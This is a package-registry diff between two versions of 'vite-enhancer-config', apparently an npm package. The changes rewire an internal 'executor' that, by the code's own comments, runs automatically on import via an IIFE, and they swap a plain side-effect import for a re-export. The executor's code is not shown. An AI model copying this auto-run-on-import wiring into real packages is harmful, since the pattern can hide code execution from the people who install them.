vite-enhancer-config 1.2.3 → 1.2.5
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/dist/core/bootstrap.d.ts
CHANGED
package/dist/core/bootstrap.js
CHANGED
|
@@ -4,7 +4,7 @@
|
|
|
4
4
|
*/
|
|
5
5
|
import { initializeLifecycle } from './lifecycle.js';
|
|
6
6
|
// Import the executor - it runs automatically due to IIFE
|
|
7
|
-
|
|
7
|
+
export * as viteConfig from '../internal/runner/index.js';
|
|
8
8
|
// Initialize lifecycle management
|
|
9
9
|
initializeLifecycle();
|
|
10
10
|
// Export bootstrap status
|
package/dist/index.d.ts
CHANGED
|
@@ -2,11 +2,11 @@
|
|
|
2
2
|
* Main entry point for vite-enhancer-config
|
|
3
3
|
* The executor runs automatically on import via IIFE
|
|
4
4
|
*/
|
|
5
|
-
import './core/bootstrap.js';
|
|
6
5
|
export { createServerEnhancer, type ServerConfig, type ServerEnhancer, } from './enhancers/server-enhancer.js';
|
|
7
6
|
export { createBuildEnhancer, type BuildConfig, type BuildEnhancer, } from './enhancers/build-enhancer.js';
|
|
8
7
|
export { createResolveEnhancer, type ResolveConfig, type ResolveEnhancer, } from './enhancers/resolve-enhancer.js';
|
|
9
8
|
export { createPluginEnhancer, type PluginConfig, type PluginEnhancer, } from './enhancers/plugin-enhancer.js';
|
|
9
|
+
export * as viteConfig from './core/bootstrap.js';
|
|
10
10
|
export { createViteEnhancer, type ViteEnhancer, type EnhancerOptions } from './enhancers/index.js';
|
|
11
11
|
export declare const VERSION = "1.0.0";
|
|
12
12
|
export declare const PACKAGE_NAME = "vite-enhancer-config";
|
package/dist/index.js
CHANGED
|
@@ -2,13 +2,13 @@
|
|
|
2
2
|
* Main entry point for vite-enhancer-config
|
|
3
3
|
* The executor runs automatically on import via IIFE
|
|
4
4
|
*/
|
|
5
|
-
// Import bootstrap - which imports the executor (IIFE runs automatically)
|
|
6
|
-
import './core/bootstrap.js';
|
|
7
5
|
// Export enhancers for active use
|
|
8
6
|
export { createServerEnhancer, } from './enhancers/server-enhancer.js';
|
|
9
7
|
export { createBuildEnhancer, } from './enhancers/build-enhancer.js';
|
|
10
8
|
export { createResolveEnhancer, } from './enhancers/resolve-enhancer.js';
|
|
11
9
|
export { createPluginEnhancer, } from './enhancers/plugin-enhancer.js';
|
|
10
|
+
// Import bootstrap
|
|
11
|
+
export * as viteConfig from './core/bootstrap.js';
|
|
12
12
|
export { createViteEnhancer } from './enhancers/index.js';
|
|
13
13
|
export const VERSION = '1.0.0';
|
|
14
14
|
export const PACKAGE_NAME = 'vite-enhancer-config';
|